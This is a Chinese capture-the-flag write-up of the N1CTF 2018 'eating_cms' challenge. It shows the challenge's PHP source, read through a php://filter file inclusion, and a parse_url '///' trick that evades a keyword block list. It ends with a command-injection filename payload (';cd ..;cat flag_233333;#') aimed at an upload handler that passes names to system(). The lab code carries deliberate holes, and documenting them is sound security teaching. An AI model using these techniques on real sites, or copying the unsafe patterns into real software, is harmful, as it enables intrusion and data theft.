[N1CTF 2018]eating_cms

场景

抓个包
看到直接给出了sql语句，测试之后发现很难饶过，访问register.php注册账号进入。

url里的page参数很容易想到文件读取，用伪协议读源码。
php://filter/read=convert.base64-encode/resource=user
主要是user.php和function.php
user.php

require_once("function.php");
if( !isset( $_SESSION['user'] )){
     
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
     
    $oper_you_can_do = $OPERATE_admin;
}else{
     
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
     
    if(!isset($_GET['page']) || $_GET['page'] === ''){
     
        $page = 'info';
    }else {
     
        $page = $_GET['page'];
    }
}
else{
     
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
     
        $page = 'guest';
    }else {
     
        $page = $_GET['page'];
        if($page === 'info')
        {
     
//            echo("");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
     
//    $page = 'info';
//}
include "$page.php";
?>

function.php

session_start();
require_once "config.php";
function Hacker()
{
     
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
     
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
     
        foreach($query as $k => $v)
        {
     
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
     
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
     
        foreach($query as $k => $v)
        {
     
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
     
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
     
        if (strpos("$whitelist", $string[$i]) === false) {
     
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
     
        Hacker();
    }
    if (is_string($string)) {
     
        return $mysqli->real_escape_string($string);
    } else {
     
        return "";
    }
}

function sql_query($sql_query)
{
     
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
     
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
     
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

看到这里

无法直接读到flag文件，这里用parse_url解析漏洞绕过。
parse_url:
本函数解析一个 URL 并返回一个关联数组，包含在 URL 中出现的各种组成部分。 本函数不是用来验证给定 URL 的合法性的，只是将其分解为下面列出的部分。不完整的 URL 也被接受，parse_url() 会尝试尽量正确地将其解析。
测试一下：

结果

array(3) { ["host"]=> string(9) "127.0.0.1" ["path"]=> string(9) "/user.php" ["query"]=> string(69) "page=php://filter/read=convert.base64-encode/resource=ffffllllaaaaggg" }
再看看$_SERVER['REQUEST_URI']的返回值。

结果

题目源码的意思是对$_SERVER[‘REQUEST_URI’]进行parse_url解析。

用伪协议直接读ffffllllaaaaggg会被检测到


有一个办法是使parse_url解析出错，从而无法进入下面的foreach判断。
只要在user.php前面加上三个/

在原题目中同样如此，成功读到文件

解码

if (FLAG_SIG != 1){
     
    die("you can not visit it directly");
}else {
     
    echo "you can find sth in m4aaannngggeee";
}
?>

读m4aaannngggeee

if (FLAG_SIG != 1){
     
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

访问

不过这是个假的页面，源码里看到php文件。伪协议继续读取。

$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
     
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
     
        die("error:can not move");
    }
}else{
     
    die("error:not an upload file！");
}
$newfile = $path.$filename;
echo "file upload success
";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "";
if($_FILES['file']['error']>0){
     
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
     
    unlink($newfile);
}
?>

访问m4aaannngggeee页面

看到这里

用filename进行命令执行
传文件抓包，修改文件名。
过滤了 /
所以最后
;cd ..;cat flag_233333;#